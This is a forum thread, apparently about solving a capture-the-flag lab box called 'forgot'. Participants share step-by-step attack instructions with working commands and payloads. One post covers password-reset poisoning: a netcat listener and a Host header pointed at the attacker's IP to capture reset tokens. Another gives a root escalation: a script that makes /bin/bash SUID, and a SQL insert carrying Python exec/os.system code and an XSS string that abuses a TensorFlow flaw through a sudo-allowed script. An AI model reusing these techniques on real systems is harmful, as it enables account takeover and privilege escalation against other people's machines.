(November 12, 2022, 11:22 PM)hunterxhack Wrote: can someone explain more how to get the token using password reset poisining pls ? after modifying the Host header so that it points to a domain that i control what should i do ?

1. set up netcat listener ex. nc -lvnp  7777
2. capture request for reset in burp for given user
3. change Host field to [your.ip.address]:7777 ex. Host: 10.10.14.88:7777
4. forward the request
5. wait for token to appear

(November 12, 2022, 11:30 PM)digPerfume Wrote:

(November 12, 2022, 11:22 PM)hunterxhack Wrote: can someone explain more how to get the token using password reset poisining pls ? after modifying the Host header so that it points to a domain that i control what should i do ?

1. set up netcat listener ex. nc -lvnp  7777
2. capture request for reset in burp for given user
3. change Host field to [your.ip.address]:7777 ex. Host: 10.10.14.88:7777
4. forward the request
5. wait for token to appear

thank you ^^

(November 12, 2022, 11:14 PM)loosie Wrote: diego@forgot:~$ sudo -l
Matching Defaults entries for diego on forgot:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User diego may run the following commands on forgot:
    (ALL) NOPASSWD: /opt/security/ml_security.py


I need to root Help me! big hint need

[quote pid="806467" dateline="1668294881"]
I also am stuck with that script. My understanding of it is that it fetches the reason (select reaseon from escalate), puts in an array and does some machine learning things I quite don't get. Pretty sure we gotta abuse that preprocess_input_exprs_arg_string since it has a safe flag at False but don't know how to inject commands into that...
[/quote]

(November 12, 2022, 11:47 PM)annehathaway Wrote:

(November 12, 2022, 11:14 PM)loosie Wrote: diego@forgot:~$ sudo -l
Matching Defaults entries for diego on forgot:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User diego may run the following commands on forgot:
    (ALL) NOPASSWD: /opt/security/ml_security.py


I need to root Help me! big hint need

[quote pid="806467" dateline="1668294881"]
I also am stuck with that script. My understanding of it is that it fetches the reason (select reaseon from escalate), puts in an array and does some machine learning things I quite don't get. Pretty sure we gotta abuse that preprocess_input_exprs_arg_string since it has a safe flag at False but don't know how to inject commands into that...

[/quote]

I stuck brother

---

(November 12, 2022, 11:47 PM)annehathaway Wrote:

(November 12, 2022, 11:14 PM)loosie Wrote: diego@forgot:~$ sudo -l
Matching Defaults entries for diego on forgot:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User diego may run the following commands on forgot:
    (ALL) NOPASSWD: /opt/security/ml_security.py


I need to root Help me! big hint need

[quote pid="806467" dateline="1668294881"]
I also am stuck with that script. My understanding of it is that it fetches the reason (select reaseon from escalate), puts in an array and does some machine learning things I quite don't get. Pretty sure we gotta abuse that preprocess_input_exprs_arg_string since it has a safe flag at False but don't know how to inject commands into that...

[/quote]
I think need to get admin_token

---

(November 12, 2022, 11:50 PM)loosie Wrote:

(November 12, 2022, 11:47 PM)annehathaway Wrote:

(November 12, 2022, 11:14 PM)loosie Wrote: diego@forgot:~$ sudo -l
Matching Defaults entries for diego on forgot:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User diego may run the following commands on forgot:
    (ALL) NOPASSWD: /opt/security/ml_security.py


I need to root Help me! big hint need

[quote pid="806467" dateline="1668294881"]
I also am stuck with that script. My understanding of it is that it fetches the reason (select reaseon from escalate), puts in an array and does some machine learning things I quite don't get. Pretty sure we gotta abuse that preprocess_input_exprs_arg_string since it has a safe flag at False but don't know how to inject commands into that...

I stuck brother

---

(November 12, 2022, 11:47 PM)annehathaway Wrote:

(November 12, 2022, 11:14 PM)loosie Wrote: diego@forgot:~$ sudo -l
Matching Defaults entries for diego on forgot:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User diego may run the following commands on forgot:
    (ALL) NOPASSWD: /opt/security/ml_security.py


I need to root Help me! big hint need

[quote pid="806467" dateline="1668294881"]
I also am stuck with that script. My understanding of it is that it fetches the reason (select reaseon from escalate), puts in an array and does some machine learning things I quite don't get. Pretty sure we gotta abuse that preprocess_input_exprs_arg_string since it has a safe flag at False but don't know how to inject commands into that...

[/quote]
I think need to get admin_token
[/quote]

Not worked!

any tip on foothold to user? i honestly cannot be arsed to try different things on this dogshit box that lets me send one request per session before it logs me out and i need to start over

(November 13, 2022, 12:37 AM)sempit3rnal Wrote: any tip on foothold to user? i honestly cannot be arsed to try different things on this dogshit box that lets me send one request per session before it logs me out and i need to start over

its in the forum look over it someone just sent the steps of instructions

For root:

First get two ssh sessions.

Create the /dev/shm/lol.sh script. Something like this:

#!/bin/bash
chmod +s /bin/bash

Don't forget to make is executable.

Read the database creds from /opt/security/ml_security.py and log in to the database. Run these:

use app;
insert into escalate values ("lol","lol","lol",'hello=exec("""
import os
os.system("/dev/shm/lol.sh")
print("&ErrMsg=%3Cimg%20src=%22http://imgur.com/bTkSe.png%22%20/%3E%3CSCRIPT%3Ealert%28%22xss%22%29%3C/SCRIPT%3E")""")');

On the second session just run:

sudo /opt/security/ml_security.py

And the /dev/shm/lol.sh should get run by root.

To explain it shortly:

The python script basically checks the reasons from escalate table in the database for xss using machine learning. If they get a score higher then .5, they get passed to preprocess_input_exprs_arg_string function which is vulnerable in tensorflow < 2.6.4, (the box has 2.6.3): https://github.com/advisories/GHSA-75c9-jrh4-79mc

Hence, all the stuff in the print function to make it pass the test.

(November 13, 2022, 01:14 AM)josh007 Wrote: how to get a reverse shell? I am stuck. The Admin don't see the tickets

look at source code to see where to find admin tickets

I found it but Access is denied :/

How did you guys get admin access? I've been trying to trigger XSS from /escalate endpoint, but to no avail